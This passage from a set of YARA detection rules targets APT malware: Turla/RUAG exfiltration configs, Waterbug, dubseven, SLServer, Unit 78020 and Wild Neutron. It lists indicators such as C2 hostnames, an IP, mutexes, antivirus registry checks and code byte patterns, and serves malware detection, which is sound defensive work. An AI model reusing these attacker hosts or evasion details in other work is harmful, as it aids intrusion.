"[NAME]" ascii $s1 = "object_id=" ascii $s2 = "[TIME]" ascii fullword $s3 = "lastconnect" ascii $s4 = "[CW_LOCAL]" ascii fullword $s5 = "system_pipe" ascii $s6 = "user_pipe" ascii $s7 = "[TRANSPORT]" ascii $s8 = "run_task_system" ascii $s9 = "[WORKDATA]" ascii $s10 = "address1" ascii condition: $h1 at 0 and 8 of ($s*) and filesize < 5KB } /* RUAG_Exfil_Config_File: "[TRANSPORT]" at offset 0, all five keys required, under 1KB; "adaptable", "post_frag" and "pfsgrowperiod" are the least generic of them. */ rule RUAG_Exfil_Config_File { meta: description = "Detects a config text file used in data exfiltration in RUAG case" author = "Florian Roth" reference = "https://goo.gl/N5MEj0" score = 60 strings: $h1 = "[TRANSPORT]" ascii $s1 = "system_pipe" ascii $s2 = "spstatus" ascii $s3 = "adaptable" ascii $s4 = "post_frag" ascii $s5 = "pfsgrowperiod" ascii condition: $h1 at 0 and all of ($s*) and filesize < 1KB } /* This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as long as you use it under this license. */ /* The pe module import below is required by WaterBug_turla_dll (pe.exports). That rule has no MZ check of its own: it pairs an export literally named "ee" with a NUL-terminated "<token>_<token>_Win32.dll"-style name, where the regex's {,2} quantifier allows zero to two underscore-separated prefix groups. */ import "pe" rule WaterBug_turla_dll { meta: description = "Symantec Waterbug Attack - Trojan Turla DLL" author = "Symantec Security Response" date = "22.01.2015" reference = "http://www.symantec.com/connect/blogs/turla-spying-tool-targets-governments-and-diplomats" strings: $a = /([A-Za-z0-9]{2,10}_){,2}Win32\.dll\x00/ condition: pe.exports("ee") and $a } /* turla_dropper: unlike its neighbours this rule does not describe the dropper binary - its strings are Windows event-log fields: Security-Auditing event 4688 (process creation) for ...\AppData\Local\Temp\rsys.exe, and Service Control Manager 7045 (service installed: "user mode service", "auto start") and 7036 ("running") for a service named "RPC Endpoint Locator". Run it against exported or parsed event logs rather than PE files. The first branch is weak - "4688" and the provider name are common - so $data is its only discriminating string; the second branch is much tighter. */ rule turla_dropper { meta: maltype = "turla dropper" ref = "https://github.com/reed1713" reference = "http://info.baesystemsdetica.com/rs/baesystems/images/snake_whitepaper.pdf" date = "3/13/2014" description = "This sample was pulled from the bae systems snake campaign report. The Turla dropper creates a file in teh temp dir and registers an auto start service call \"RPC Endpoint Locator\"." 
strings: $type="Microsoft-Windows-Security-Auditing" $eventid="4688" $data="AppData\\Local\\Temp\\rsys.exe" $type1="Service Control Manager" $eventid1="7036" $data1="RPC Endpoint Locator" $data2="running" $type2="Service Control Manager" $eventid2="7045" $data3="RPC Endpoint Locator" $data4="user mode service" $data5="auto start" condition: ($type and $eventid and $data) or ($type1 and $eventid1 and $data1 and $data2 and $type2 and $eventid2 and $data3 and $data4 and $data5) } /* This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as long as you use it under this license. */ /* dubseven_file_set: the eight paths are ascii-only (no "wide" modifier), so UTF-16 copies of these paths are not matched; 3 of 8 plus the MZ/PE header checks. On a one-line rendering like this the "//" comments inside the condition run to end of line - restore the original line breaks before compiling. */ rule dubseven_file_set { meta: author = "Matt Brooks, @cmatthewbrooks" desc = "Searches for service files loading UP007" strings: $file1 = "\\Microsoft\\Internet Explorer\\conhost.exe" $file2 = "\\Microsoft\\Internet Explorer\\dll2.xor" $file3 = "\\Microsoft\\Internet Explorer\\HOOK.DLL" $file4 = "\\Microsoft\\Internet Explorer\\main.dll" $file5 = "\\Microsoft\\Internet Explorer\\nvsvc.exe" $file6 = "\\Microsoft\\Internet Explorer\\SBieDll.dll" $file7 = "\\Microsoft\\Internet Explorer\\mon" $file8 = "\\Microsoft\\Internet Explorer\\runas.exe" condition: //MZ header //PE signature //Just a few of these as they differ uint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550 and 3 of ($file*) } /* dubseven_dropper_registry_checks: the seven keys belong to security products (360Safe, Kingsoft, Avira, Rising, JiangMin, Micropoint) the dropper looks for. "all of" makes this precise but brittle - a variant that drops or renames one key no longer matches. "Avira Destop" is the sample's own spelling and must stay as-is. */ rule dubseven_dropper_registry_checks { meta: author = "Matt Brooks, @cmatthewbrooks" desc = "Searches for registry keys checked for by the dropper" strings: $reg1 = "SOFTWARE\\360Safe\\Liveup" $reg2 = "Software\\360safe" $reg3 = "SOFTWARE\\kingsoft\\Antivirus" $reg4 = "SOFTWARE\\Avira\\Avira Destop" $reg5 = "SOFTWARE\\rising\\RAV" $reg6 = "SOFTWARE\\JiangMin" $reg7 = "SOFTWARE\\Micropoint\\Anti-Attack" condition: //MZ header //PE signature uint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550 and all of ($reg*) } rule dubseven_dropper_dialog_remains { meta: author = "Matt Brooks, @cmatthewbrooks" desc = "Searches for 
related dialog remnants. How rude." strings: $dia1 = "fuckMessageBox 1.0" wide $dia2 = "Rundll 1.0" wide condition: //MZ header //PE signature uint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550 and any of them } /* maindll_mutex: single hard-coded mutex name; mutex strings are a useful pivot for live-process and memory scans as well as files, but one string plus a PE header check is a thin match on its own. */ rule maindll_mutex { meta: author = "Matt Brooks, @cmatthewbrooks" desc = "Matches on the maindll mutex" ref = "https://citizenlab.org/2016/04/between-hong-kong-and-burma/" strings: $mutex = "h31415927tttt" condition: //MZ header //PE signature uint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550 and $mutex } /* SLServer_*: the five SLServer rules below are single-indicator rules sharing the same MZ/PE header check. Treat them as a set - "SLServer" alone is the weakest, the mutex, C2 host and campaign code are the specific ones - and corroborate hits across them rather than reading any one as conclusive. A C2 hostname can be sinkholed or re-registered, so the domain rule in particular dates quickly. */ rule SLServer_dialog_remains { meta: author = "Matt Brooks, @cmatthewbrooks" desc = "Searches for related dialog remnants." ref = "https://citizenlab.org/2016/04/between-hong-kong-and-burma/" strings: $slserver = "SLServer" wide condition: //MZ header //PE signature uint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550 and $slserver } rule SLServer_mutex { meta: author = "Matt Brooks, @cmatthewbrooks" desc = "Searches for the mutex." ref = "https://citizenlab.org/2016/04/between-hong-kong-and-burma/" strings: $mutex = "M&GX^DSF&DA@F" condition: //MZ header //PE signature uint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550 and $mutex } rule SLServer_command_and_control { meta: author = "Matt Brooks, @cmatthewbrooks" desc = "Searches for the C2 server." ref = "https://citizenlab.org/2016/04/between-hong-kong-and-burma/" strings: $c2 = "safetyssl.security-centers.com" condition: //MZ header //PE signature uint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550 and $c2 } rule SLServer_campaign_code { meta: author = "Matt Brooks, @cmatthewbrooks" desc = "Searches for the related campaign code." ref = "https://citizenlab.org/2016/04/between-hong-kong-and-burma/" strings: $campaign = "wthkdoc0106" condition: //MZ header //PE signature uint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550 and $campaign } rule SLServer_unknown_string { meta: author = "Matt Brooks, @cmatthewbrooks" desc = "Searches for a unique string." 
ref = "https://citizenlab.org/2016/04/between-hong-kong-and-burma/" strings: $string = "test-b7fa835a39" condition: //MZ header //PE signature uint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550 and $string } /* This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as long as you use it under this license. */ /* Yara Rule Set Author: Florian Roth Date: 2015-09-24 Identifier: Unit 78020 Malware */ rule Unit78020_Malware_Gen1 { meta: description = "Detects malware by Chinese APT PLA Unit 78020 - Generic Rule" author = "Florian Roth" reference = "http://threatconnect.com/camerashy/?utm_campaign=CameraShy" date = "2015-09-24" hash1 = "2b15e614fb54bca7031f64ab6caa1f77b4c07dac186826a6cd2e254090675d72" hash2 = "76c586e89c30a97e583c40ebe3f4ba75d5e02e52959184c4ce0a46b3aac54edd" hash3 = "2625a0d91d3cdbbc7c4a450c91e028e3609ff96c4f2a5a310ae20f73e1bc32ac" hash4 = "5c62b1d16e6180f22a0cb59c99a7743f44cb4a41e4e090b9733d1fb687c8efa2" hash5 = "7b73bf2d80a03eb477242967628da79924fbe06cc67c4dcdd2bdefccd6e0e1af" hash6 = "88c5be84afe20c91e4024160303bafb044f98aa5fbf8c9f9997758a014238790" strings: $x1 = "greensky27.vicp.net" fullword wide $x2 = "POST http://%s:%d/aspxabcdefg.asp?%s HTTP/1.1" fullword ascii $x3 = "GET http://%s:%d/aspxabcdef.asp?%s HTTP/1.1" fullword ascii /* additional strings based on PDF report - not found in samples */ $x4 = "serch.vicp.net" fullword wide $x5 = "greensky27.vicp.net" fullword wide $x6 = "greensky27.vicp.net.as" fullword wide $x7 = "greensky27.vcip.net" fullword wide $x8 = "pnoc-ec.vicp.net" fullword wide $x9 = "aseanph.vicp.net" fullword wide $x10 = "pnoc.vicp.net" fullword wide $a1 = "dMozilla/4.0 (compatible; MSIE 6.0;Windows NT 5.0; .NET CLR 1.1.4322)" fullword wide /* typo */ $a2 = "User-Agent: Netscape" fullword ascii /* ;) */ $a3 = "Accept-Language:En-us/r/n" fullword wide /* typo */ $a4 = "\\Office Start.lnk" fullword wide $a5 = "\\MSN Talk Start.lnk" fullword wide 
$s1 = "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322)" fullword wide $s2 = "User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-EN; rv:1.7.12) Gecko/20100719 Firefox/1.0.7" fullword ascii $s3 = "%USERPROFILE%\\Application Data\\Mozilla\\Firefox\\Profiles" fullword wide $s4 = "Content-Type:application/x-www-form-urlencoded/r/n" fullword wide $s5 = "Hello World!" fullword wide $s6 = "Accept-Encoding:gzip,deflate/r/n" fullword wide $s7 = "/%d%s%d" fullword ascii $s8 = "%02d-%02d-%02d %02d:%02d" fullword wide $s9 = "WininetMM Version 1.0" fullword wide $s10 = "WININETMM" fullword wide $s11 = "GET %dHTTP/1.1" fullword ascii $s12 = "POST http://%ws:%d/%d%s%dHTTP/1.1" fullword ascii $s13 = "PeekNamePipe" fullword ascii $s14 = "Normal.dot" fullword ascii $s15 = "R_eOR_eOR_eO)CiOS_eO" fullword ascii $s16 = "DRIVE_RAMDISK" fullword wide $s17 = "%s %s %s %s %d %d %d %d " fullword ascii condition: ( uint16(0) == 0x5a4d and filesize < 250KB and 1 of ($x*) ) or 2 of ($a*) or 6 of ($s*) } rule Unit78020_Malware_1 { meta: description = "Detects malware by Chinese APT PLA Unit 78020 - Specific Rule - msictl.exe" author = "Florian Roth" reference = "http://threatconnect.com/camerashy/?utm_campaign=CameraShy" date = "2015-09-24" hash = "a93d01f1cc2d18ced2f3b2b78319aadc112f611ab8911ae9e55e13557c1c791a" strings: $s1 = "%ProgramFiles%\\Internet Explorer\\iexplore.exe" fullword ascii $s2 = "msictl.exe" fullword ascii $s3 = "127.0.0.1:8080" fullword ascii $s4 = "mshtml.dat" fullword ascii $s5 = "msisvc" fullword ascii $s6 = "NOKIAN95/WEB" fullword ascii condition: uint16(0) == 0x5a4d and filesize < 160KB and 4 of them } rule Unit78020_Malware_Gen2 { meta: description = "Detects malware by Chinese APT PLA Unit 78020 - Generic Rule" author = "Florian Roth" reference = "http://threatconnect.com/camerashy/?utm_campaign=CameraShy" date = "2015-09-24" super_rule = 1 hash1 = "76c586e89c30a97e583c40ebe3f4ba75d5e02e52959184c4ce0a46b3aac54edd" hash2 = 
"7b73bf2d80a03eb477242967628da79924fbe06cc67c4dcdd2bdefccd6e0e1af" hash3 = "981e2fa1ae4145359036b46e8b53cc5da37dd2311204859761bd91572f025e8a" strings: $s0 = "-GetModuleFileNameExW" fullword ascii $s1 = "\\MSN Talk Start.lnk" fullword wide $s2 = ":SeDebugPrivilege" fullword wide $s3 = "WinMM Version 1.0" fullword wide $s4 = "dwError1 = %d" fullword ascii $s5 = "*Can't Get" fullword wide condition: uint16(0) == 0x5a4d and filesize < 1000KB and all of them } rule Unit78020_Malware_Gen3 { meta: description = "Detects malware by Chinese APT PLA Unit 78020 - Generic Rule - Chong" author = "Florian Roth" reference = "http://threatconnect.com/camerashy/?utm_campaign=CameraShy" date = "2015-09-24" super_rule = 1 hash1 = "2625a0d91d3cdbbc7c4a450c91e028e3609ff96c4f2a5a310ae20f73e1bc32ac" hash2 = "5c62b1d16e6180f22a0cb59c99a7743f44cb4a41e4e090b9733d1fb687c8efa2" strings: $x1 = "GET http://%ws:%d/%d%s%dHTTP/1.1" fullword ascii $x2 = "POST http://%ws:%d/%d%s%dHTTP/1.1" fullword ascii $x3 = "J:\\chong\\" ascii $s1 = "User-Agent: Netscape" fullword ascii $s2 = "User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-EN; rv:1.7.12) Gecko/20100719 Firefox/1.0.7" fullword ascii $s3 = "Software\\Microsoft\\Windows\\CurrentVersion\\explorer\\User Shell Folders" fullword wide $s4 = "J:\\chong\\nod\\Release\\SslMM.exe" fullword ascii $s5 = "MM.exe" fullword ascii $s6 = "network.proxy.ssl" fullword wide $s7 = "PeekNamePipe" fullword ascii $s8 = "Host: %ws:%d" fullword ascii $s9 = "GET %dHTTP/1.1" fullword ascii $s10 = "SCHANNEL.DLL" fullword ascii /* Goodware String - occured 6 times */ condition: ( uint16(0) == 0x5a4d and filesize < 300KB and 1 of ($x*) ) or 4 of ($s*) } /* This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as long as you use it under this license. 
*/ import "pe" rule WaterBug_wipbot_2013_core_PDF { meta: description = "Symantec Waterbug Attack - Trojan.Wipbot 2014 core PDF" author = "Symantec Security Response" date = "22.01.2015" reference = "http://t.co/rF35OaAXrl" strings: $PDF = "%PDF-" $a = /\+[A-Za-z]{1}\. _ _ \$\+[A-Za-z]{1}\. _ \$ _ \+/ $b = /\+[A-Za-z]{1}\.\$\$\$ _ \+/ condition: ($PDF at 0) and #a > 150 and #b > 200 } rule WaterBug_wipbot_2013_dll { meta: description = "Symantec Waterbug Attack - Trojan.Wipbot 2014 Down.dll component" author = "Symantec Security Response" date = "22.01.2015" reference = "http://t.co/rF35OaAXrl" strings: $string1 = "/%s?rank=%s" $string2 = "ModuleStart\x00ModuleStop\x00start" $string3 = "1156fd22-3443-4344-c4ffff" //read file... error.. $string4 = "read\x20file\x2E\x2E\x2E\x20error\x00\x00" condition: 2 of them } rule WaterBug_wipbot_2013_core { meta: description = "Symantec Waterbug Attack - Trojan.Wipbot core + core; garbage appended data (PDF Exploit leftovers) + wipbot dropper; fake AdobeRd32 Error" author = "Symantec Security Response" date = "22.01.2015" reference = "http://t.co/rF35OaAXrl" strings: $mz = "MZ" $code1 = { 89 47 0C C7 47 10 90 C2 04 00 C7 47 14 90 C2 10 00 C7 47 18 90 90 60 68 89 4F 1C C7 47 20 90 90 90 B8 89 4F 24 C7 47 28 90 FF D0 61 C7 47 2C 90 C2 04 00} $code2 = { 85 C0 75 25 8B 0B BF ?? ?? ?? ?? EB 17 69 D7 0D 66 19 00 8D BA 5F F3 6E 3C 89 FE C1 EE 10 89 F2 30 14 01 40 3B 43 04 72 E4} $code3 = {90 90 90 ?? B9 00 4D 5A 90 00 03 00 00 00 82 04} $code4 = {55 89 E5 5D C3 55 89 E5 83 EC 18 8B 45 08 85 C0} condition: $mz at 0 and (($code1 or $code2) or ($code3 and $code4)) } rule WaterBug_turla_dropper { meta: description = "Symantec Waterbug Attack - Trojan Turla Dropper" author = "Symantec Security Response" date = "22.01.2015" reference = "http://t.co/rF35OaAXrl" strings: $a = {0F 31 14 31 20 31 3C 31 85 31 8C 31 A8 31 B1 31 D1 31 8B 32 91 32 B6 32 C4 32 6C 33 AC 33 10 34} $b = {48 41 4C 2E 64 6C 6C 00 6E 74 64 6C 6C 00 00 00 57 8B F9 8B 0D ?? 
?? ?? ?? ?? C9 75 26 56 0F 20 C6 8B C6 25 FF FF FE FF 0F 22 C0 E8} condition: all of them } rule WaterBug_fa_malware { meta: description = "Symantec Waterbug Attack - FA malware variant" author = "Symantec Security Response" date = "22.01.2015" reference = "http://t.co/rF35OaAXrl" strings: $mz = "MZ" $string1 = "C:\\proj\\drivers\\fa _ 2009\\objfre\\i386\\atmarpd.pdb" $string2 = "d:\\proj\\cn\\fa64\\" $string3 = "sengoku_Win32.sys\x00" $string4 = "rk_ntsystem.c" $string5 = "\\uroboros\\" $string6 = "shell.{F21EDC09-85D3-4eb9-915F-1AFA2FF28153}" condition: ($mz at 0) and (any of ($string*)) } rule WaterBug_sav { meta: description = "Symantec Waterbug Attack - SAV Malware" author = "Symantec Security Response" date = "22.01.2015" reference = "http://t.co/rF35OaAXrl" strings: $mz = "MZ" $code1a = { 8B 75 18 31 34 81 40 3B C2 72 F5 33 F6 39 7D 14 76 1B 8A 04 0E 88 04 0F 6A 0F 33 D2 8B C7 5B F7 F3 85 D2 75 01 } $code1b = { 8B 45 F8 40 89 45 F8 8B 45 10 C1 E8 02 39 45 F8 73 17 8B 45 F8 8B 4D F4 8B 04 81 33 45 20 8B 4D F8 8B 55 F4 89 04 8A EB D7 83 65 F8 00 83 65 EC 00 EB 0E 8B 45 F8 40 89 45 F8 8B 45 EC 40 89 45 EC 8B 45 EC 3B 45 10 73 27 8B 45 F4 03 45 F8 8B 4D F4 03 4D EC 8A 09 88 08 8B 45 F8 33 D2 6A 0F 59 F7 F1 85 D2 75 07 } $code1c = { 8A 04 0F 88 04 0E 6A 0F 33 D2 8B C6 5B F7 F3 85 D2 75 01 47 8B 45 14 46 47 3B F8 72 E3 EB 04 C6 04 08 00 48 3B C6 73 F7 33 C0 C1 EE 02 74 0B 8B 55 18 31 14 81 40 3B C6 72 F5 } $code2 = { 29 5D 0C 8B D1 C1 EA 05 2B CA 8B 55 F4 2B C3 3D 00 00 00 01 89 0F 8B 4D 10 8D 94 91 00 03 00 00 73 17 8B 7D F8 8B 4D 0C 0F B6 3F C1 E1 08 0B CF C1 E0 08 FF 45 F8 89 4D 0C 8B 0A 8B F8 C1 EF 0B} condition: ($mz at 0) and (($code1a or $code1b or $code1c) and $code2) } /* This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as long as you use it under this license. 
*/ rule WildNeutron_Sample_1 { meta: description = "Wild Neutron APT Sample Rule - file 2b5065a3d0e0b8252a987ef5f29d9e1935c5863f5718b83440e68dc53c21fa94" author = "Florian Roth" reference = "https://securelist.com/blog/research/71275/wild-neutron-economic-espionage-threat-actor-returns-with-new-tricks/" date = "2015-07-10" score = 60 hash = "2b5065a3d0e0b8252a987ef5f29d9e1935c5863f5718b83440e68dc53c21fa94" strings: $s0 = "LiveUpdater.exe" fullword wide /* PEStudio Blacklist: strings */ /* score: '25.00' */ $s1 = "id-at-postalAddress" fullword ascii /* PEStudio Blacklist: strings */ /* score: '18.00' */ $s2 = "%d -> %d (default)" fullword wide /* PEStudio Blacklist: strings */ /* score: '17.00' */ $s3 = "%s%s%s=%d,%s=%d,%s=%d," fullword wide /* score: '15.00' */ $s8 = "id-ce-keyUsage" fullword ascii /* score: '12.00' */ $s9 = "Key Usage" fullword ascii /* score: '12.00' */ $s32 = "UPDATE_ID" fullword wide /* PEStudio Blacklist: strings */ /* score: '9.00' */ $s37 = "id-at-commonName" fullword ascii /* score: '8.00' */ $s38 = "2008R2" fullword wide /* PEStudio Blacklist: os */ /* score: '8.00' */ $s39 = "RSA-alt" fullword ascii /* PEStudio Blacklist: strings */ /* score: '8.00' */ $s40 = "%02d.%04d.%s" fullword wide /* score: '7.02' */ condition: uint16(0) == 0x5a4d and filesize < 800KB and all of them } rule WildNeutron_Sample_2 { meta: description = "Wild Neutron APT Sample Rule - file 8d80f9ef55324212759f4b6070cb8fce18a008ae9dd8b9598553206654d13a6f" author = "Florian Roth" reference = "https://securelist.com/blog/research/71275/wild-neutron-economic-espionage-threat-actor-returns-with-new-tricks/" date = "2015-07-10" score = 60 hash = "8d80f9ef55324212759f4b6070cb8fce18a008ae9dd8b9598553206654d13a6f" strings: $s0 = "rundll32.exe \"%s\",#1" fullword wide /* PEStudio Blacklist: strings */ /* score: '33.00' */ $s1 = "IgfxUpt.exe" fullword wide /* score: '20.00' */ $s2 = "id-at-postalAddress" fullword ascii /* PEStudio Blacklist: strings */ /* score: '18.00' */ $s3 = 
"Intel(R) Common User Interface" fullword wide /* PEStudio Blacklist: strings */ /* score: '17.00' */ $s4 = "%s%s%s=%d,%s=%d,%s=%d," fullword wide /* score: '15.00' */ $s11 = "Key Usage" fullword ascii /* score: '12.00' */ $s12 = "Intel Integrated Graphics Updater" fullword wide /* PEStudio Blacklist: strings */ /* score: '12.00' */ $s13 = "%sexpires on : %04d-%02d-%02d %02d:%02d:%02d" fullword ascii /* PEStudio Blacklist: strings */ /* score: '11.00' */ condition: uint16(0) == 0x5a4d and filesize < 600KB and all of them } rule WildNeutron_Sample_3 { meta: description = "Wild Neutron APT Sample Rule - file c2c761cde3175f6e40ed934f2e82c76602c81e2128187bab61793ddb3bc686d0" author = "Florian Roth" reference = "https://securelist.com/blog/research/71275/wild-neutron-economic-espionage-threat-actor-returns-with-new-tricks/" date = "2015-07-10" score = 60 hash = "c2c761cde3175f6e40ed934f2e82c76602c81e2128187bab61793ddb3bc686d0" strings: $x1 = "178.162.197.9" fullword ascii /* score: '9.00' */ $x2 = "\"http://fw.ddosprotected.eu:80 /opts resolv=drfx.chickenkiller.com\"" fullword wide /* PEStudio Blacklist: strings */ /* score: '33.00' */ $s1 = "LiveUpdater.exe" fullword wide /* PEStudio Blacklist: strings */ /* score: '25.00' */ $s2 = "id-at-postalAddress" fullword ascii /* PEStudio Blacklist: strings */ /* score: '18.00' */ $s3 = "%d -> %d (default)" fullword wide /* PEStudio Blacklist: strings */ /* score: '17.00' */ $s4 = "%s%s%s=%d,%s=%d,%s=%d," fullword wide /* score: '15.00' */ $s5 = "id-at-serialNumber" fullword ascii /* PEStudio Blacklist: strings */ /* score: '10.00' */ $s6 = "ECDSA with SHA256" fullword ascii /* PEStudio Blacklist: strings */ /* score: '10.00' */ $s7 = "Acer LiveUpdater" fullword wide /* PEStudio Blacklist: strings */ /* score: '10.00' */ condition: uint16(0) == 0x5a4d and filesize < 2020KB and ( 1 of ($x*) or all of ($s*) ) } rule WildNeutron_Sample_4 { meta: description = "Wild Neutron APT Sample Rule - file 
b4005530193bc523d3e0193c3c53e2737ae3bf9f76d12c827c0b5cd0dcbaae45" author = "Florian Roth" reference = "https://securelist.com/blog/research/71275/wild-neutron-economic-espionage-threat-actor-returns-with-new-tricks/" date = "2015-07-10" score = 60 hash = "b4005530193bc523d3e0193c3c53e2737ae3bf9f76d12c827c0b5cd0dcbaae45" strings: $x1 = "WinRAT-Win32-Release.exe" fullword ascii /* score: '22.00' */ $s0 = "rundll32.exe \"%s\",#1" fullword wide /* PEStudio Blacklist: strings */ /* score: '33.00' */ $s1 = "RtlUpd.EXE" fullword wide /* score: '20.00' */ $s2 = "RtlUpd.exe" fullword wide /* score: '20.00' */ $s3 = "Driver Update and remove for Windows x64 or x86_32" fullword wide /* PEStudio Blacklist: strings */ /* score: '17.00' */ $s4 = "Realtek HD Audio Update and remove driver Tool" fullword wide /* PEStudio Blacklist: strings */ /* score: '16.00' */ $s5 = "%s%s%s=%d,%s=%d,%s=%d," fullword wide /* score: '15.00' */ $s6 = "Key Usage" fullword ascii /* score: '12.00' */ $s7 = "id-at-serialNumber" fullword ascii /* PEStudio Blacklist: strings */ /* score: '10.00' */ condition: uint16(0) == 0x5a4d and filesize < 1240KB and all of them } rule WildNeutron_Sample_5 { meta: description = "Wild Neutron APT Sample Rule - file 1604e36ccef5fa221b101d7f043ad7f856b84bf1a80774aa33d91c2a9a226206" author = "Florian Roth" reference = "https://securelist.com/blog/research/71275/wild-neutron-economic-espionage-threat-actor-returns-with-new-tricks/" date = "2015-07-10" score = 60 hash = "1604e36ccef5fa221b101d7f043ad7f856b84bf1a80774aa33d91c2a9a226206" strings: $s0 = "LiveUpdater.exe" fullword wide /* PEStudio Blacklist: strings */ /* score: '25.00' */ $s1 = "id-at-postalAddress" fullword ascii /* PEStudio Blacklist: strings */ /* score: '18.00' */ $s2 = "%d -> %d (default)" fullword wide /* PEStudio Blacklist: strings */ /* score: '17.00' */ $s3 = "%s%s%s=%d,%s=%d,%s=%d," fullword wide /* score: '15.00' */ $s4 = "sha-1WithRSAEncryption" fullword ascii /* PEStudio Blacklist: strings */ /* 
score: '15.00' */ $s5 = "Postal code" fullword ascii /* PEStudio Blacklist: strings */ /* score: '14.00' */ $s6 = "id-ce-keyUsage" fullword ascii /* score: '12.00' */ $s7 = "Key Usage" fullword ascii /* score: '12.00' */ $s8 = "TLS-RSA-WITH-3DES-EDE-CBC-SHA" fullword ascii /* PEStudio Blacklist: strings */ /* score: '11.00' */ $s9 = "%02d.%04d.%s" fullword wide /* score: '7.02' */ condition: uint16(0) == 0x5a4d and filesize < 1000KB and all of them } rule WildNeutron_Sample_6 { meta: description = "Wild Neutron APT Sample Rule - file 4bd548fe07b19178281edb1ee81c9711525dab03dc0b6676963019c44cc75865" author = "Florian Roth" reference = "https://securelist.com/blog/research/71275/wild-neutron-economic-espionage-threat-actor-returns-with-new-tricks/" date = "2015-07-10" score = 60 hash = "4bd548fe07b19178281edb1ee81c9711525dab03dc0b6676963019c44cc75865" strings: $s0 = "mshtaex.exe" fullword wide /* score: '20.00' */ condition: uint16(0) == 0x5a4d and filesize < 310KB and all of them } rule WildNeutron_Sample_7 { meta: description = "Wild Neutron APT Sample Rule - file a14d31eb965ea8a37ebcc3b5635099f2ca08365646437c770212d534d504ff3c" author = "Florian Roth" reference = "https://securelist.com/blog/research/71275/wild-neutron-economic-espionage-threat-actor-returns-with-new-tricks/" date = "2015-07-10" score = 60 hash = "a14d31eb965ea8a37ebcc3b5635099f2ca08365646437c770212d534d504ff3c" strings: $s0 = "checking match for '%s' user %s host %s addr %s" fullword ascii /* PEStudio Blacklist: strings */ /* score: '24.00' */ $s1 = "PEM_read_bio_PrivateKey failed" fullword ascii /* PEStudio Blacklist: strings */ /* score: '23.00' */ $s2 = "usage: %s [-ehR] [-f log_facility] [-l log_level] [-u umask]" fullword ascii /* score: '23.00' */ $s3 = "%s %s for %s%.100s from %.200s port %d%s" fullword ascii /* PEStudio Blacklist: strings */ /* score: '23.00' */ $s4 = "clapi32.dll" fullword ascii /* score: '21.00' */ $s5 = "Connection from %s port %d" fullword ascii /* PEStudio Blacklist: 
strings */ /* score: '17.00' */ $s6 = "/usr/etc/ssh_known_hosts" fullword ascii /* PEStudio Blacklist: strings */ /* score: '16.00' */ $s7 = "Version: %s - %s %s %s %s" fullword ascii /* score: '16.00' */ $s8 = "[-] connect()" fullword ascii /* PEStudio Blacklist: strings */ /* score: '13.00' */ $s9 = "/bin/sh /usr/etc/sshrc" fullword ascii /* score: '12.42' */ $s10 = "kexecdhs.c" fullword ascii /* score: '12.00' */ $s11 = "%s: setrlimit(RLIMIT_FSIZE, { 0, 0 }): %s" fullword ascii /* score: '11.00' */ condition: uint16(0) == 0x5a4d and filesize < 5000KB and all of them } rule WildNeutron_Sample_8 { meta: description = "Wild Neutron APT Sample Rule - file 758e6b519f6c0931ff93542b767524fc1eab589feb5cfc3854c77842f9785c92" author = "Florian Roth" reference = "https://securelist.com/blog/research/71275/wild-neutron-economic-espionage-threat-actor-returns-with-new-tricks/" date = "2015-07-10" score = 60 hash = "758e6b519f6c0931ff93542b767524fc1eab589feb5cfc3854c77842f9785c92" strings: $x1 = "RunFile: couldn't load SHELL32.DLL!" fullword ascii /* PEStudio Blacklist: strings */ /* score: '27.00' */ $x2 = "RunFile: couldn't find ShellExecuteExA/W in SHELL32.DLL!" fullword ascii /* PEStudio Blacklist: strings */ /* score: '35.00' */ $x3 = "Error executing CreateProcess()!!" fullword wide /* PEStudio Blacklist: strings */ /* score: '31.00' */ $x4 = "cmdcmdline" fullword wide /* score: '11.00' */ $x5 = "Invalid input handle!!!" 
fullword ascii /* PEStudio Blacklist: strings */ /* score: '10.00' */ $s1 = "Process %d terminated" fullword wide /* PEStudio Blacklist: strings */ /* score: '24.00' */ $s2 = "Process is not running any more" fullword wide /* PEStudio Blacklist: strings */ /* score: '22.00' */ $s3 = "javacpl.exe" fullword wide /* score: '3.00' */ /* Goodware String - occured 2 times */ $s4 = "Windows NT Version %lu.%lu" fullword wide /* PEStudio Blacklist: os */ /* score: '19.00' */ $s5 = "Usage: destination [reference]" fullword wide /* PEStudio Blacklist: strings */ /* score: '16.00' */ $s6 = ".com;.exe;.bat;.cmd" fullword wide /* score: '15.00' */ $s7 = ") -%s-> %s (" fullword ascii /* score: '14.00' */ $s8 = "cmdextversion" fullword wide /* score: '14.00' */ $s9 = "Invalid pid (%s)" fullword wide /* PEStudio Blacklist: strings */ /* score: '13.00' */ $s10 = "\"%s\" /K %s" fullword wide /* score: '11.02' */ $s11 = "Error setting %s (%s)" fullword wide /* score: '11.00' */ $s12 = "DEBUG: Cannot allocate memory for ptrNextNode->ptrNext!" fullword ascii /* PEStudio Blacklist: strings */ /* score: '10.00' */ $s13 = "Failed to build full directory path" fullword wide /* score: '10.00' */ $s14 = "DEBUG: Cannot allocate memory for ptrFileArray!" 
